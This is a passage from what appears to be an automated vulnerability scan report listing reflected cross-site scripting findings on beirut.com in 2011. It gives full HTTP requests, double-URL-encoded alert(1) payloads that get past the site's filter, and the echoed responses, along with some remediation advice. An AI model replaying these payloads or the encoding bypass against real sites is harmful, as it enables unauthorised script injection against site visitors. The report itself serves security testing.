Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:33:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=6138322c3"><script>alert(1)</script>beaa1e96712&randstyle=magenta">
...[SNIP]...

4.1110. http://www.beirut.com/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed52038f0d04 was submitted in the REST URL parameter 4. This input was echoed as 77b09"><script>alert(1)</script>d52038f0d04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/600077b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed52038f0d04 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:28:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=600077b09"><script>alert(1)</script>d52038f0d04&randstyle=green">
...[SNIP]...

4.1111. http://www.beirut.com/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cb14%2527%253balert%25281%2529%252f%252f5a59de710bb was submitted in the REST URL parameter 4. This input was echoed as 1cb14';alert(1)//5a59de710bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/60001cb14%2527%253balert%25281%2529%252f%252f5a59de710bb HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:30:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='60001cb14';alert(1)//5a59de710bb';
var showfacebox='';
</script>
...[SNIP]...

4.1112. http://www.beirut.com/ThingsToDo/Hamra/Yasmina-Fayed/6158 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Hamra/Yasmina-Fayed/6158

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6bf2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee39e0afcf6e was submitted in the REST URL parameter 4. This input was echoed as b6bf2"><script>alert(1)</script>e39e0afcf6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Hamra/Yasmina-Fayed/6158b6bf2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee39e0afcf6e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:40:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=6158b6bf2"><script>alert(1)</script>e39e0afcf6e&randstyle=magenta">
...[SNIP]...

4.1113. http://www.beirut.com/ThingsToDo/Hamra/Yasmina-Fayed/6158 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Hamra/Yasmina-Fayed/6158

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6eb4%2527%253balert%25281%2529%252f%252f4d324e216e was submitted in the REST URL parameter 4. This input was echoed as f6eb4';alert(1)//4d324e216e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Hamra/Yasmina-Fayed/6158f6eb4%2527%253balert%25281%2529%252f%252f4d324e216e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:41:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='6158f6eb4';alert(1)//4d324e216e';
var showfacebox='';
</script>
...[SNIP]...

4.1114. http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Live-Music/560568055

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39723"><a>09dc4a4ee5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo39723"><a>09dc4a4ee5/Live-Music/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:01:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=ThingsToDo39723"><a>09dc4a4ee5/Live-Music&listingtype=events.php&Types=">
...[SNIP]...

4.1115. http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Live-Music/560568055

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d954'-alert(1)-'acab0962de2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo5d954'-alert(1)-'acab0962de2/Live-Music/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:12:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDo5d954'-alert(1)-'acab0962de2/Live-Music';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1116. http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Live-Music/560568055

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1c33"><a>3503fd45ff8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Live-Musicb1c33"><a>3503fd45ff8/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:16:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo/Live-Musicb1c33"><a>3503fd45ff8&listingtype=events.php&Types=2">
...[SNIP]...

4.1117. http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Live-Music/560568055

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ec8f'-alert(1)-'e79945d96e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Live-Music4ec8f'-alert(1)-'e79945d96e9/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:27:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='ThingsToDo/Live-Music4ec8f'-alert(1)-'e79945d96e9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1118. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bdc"><a>e917fcc1615 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDoe3bdc"><a>e917fcc1615/Markets-and-Deals/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:44:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=ThingsToDoe3bdc"><a>e917fcc1615/Markets-and-Deals&listingtype=events.php&Types=">
...[SNIP]...

4.1119. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1309b'-alert(1)-'bd06f90935b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo1309b'-alert(1)-'bd06f90935b/Markets-and-Deals/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:53:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='ThingsToDo1309b'-alert(1)-'bd06f90935b/Markets-and-Deals';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1120. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e6c8"><a>bfb5ed55339 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Markets-and-Deals5e6c8"><a>bfb5ed55339/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:56:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo/Markets-and-Deals5e6c8"><a>bfb5ed55339&listingtype=events.php&Types=19">
...[SNIP]...

4.1121. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceee6'-alert(1)-'21ad3a8efea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Markets-and-Dealsceee6'-alert(1)-'21ad3a8efea/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:06:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDo/Markets-and-Dealsceee6'-alert(1)-'21ad3a8efea';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1122. http://www.beirut.com/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
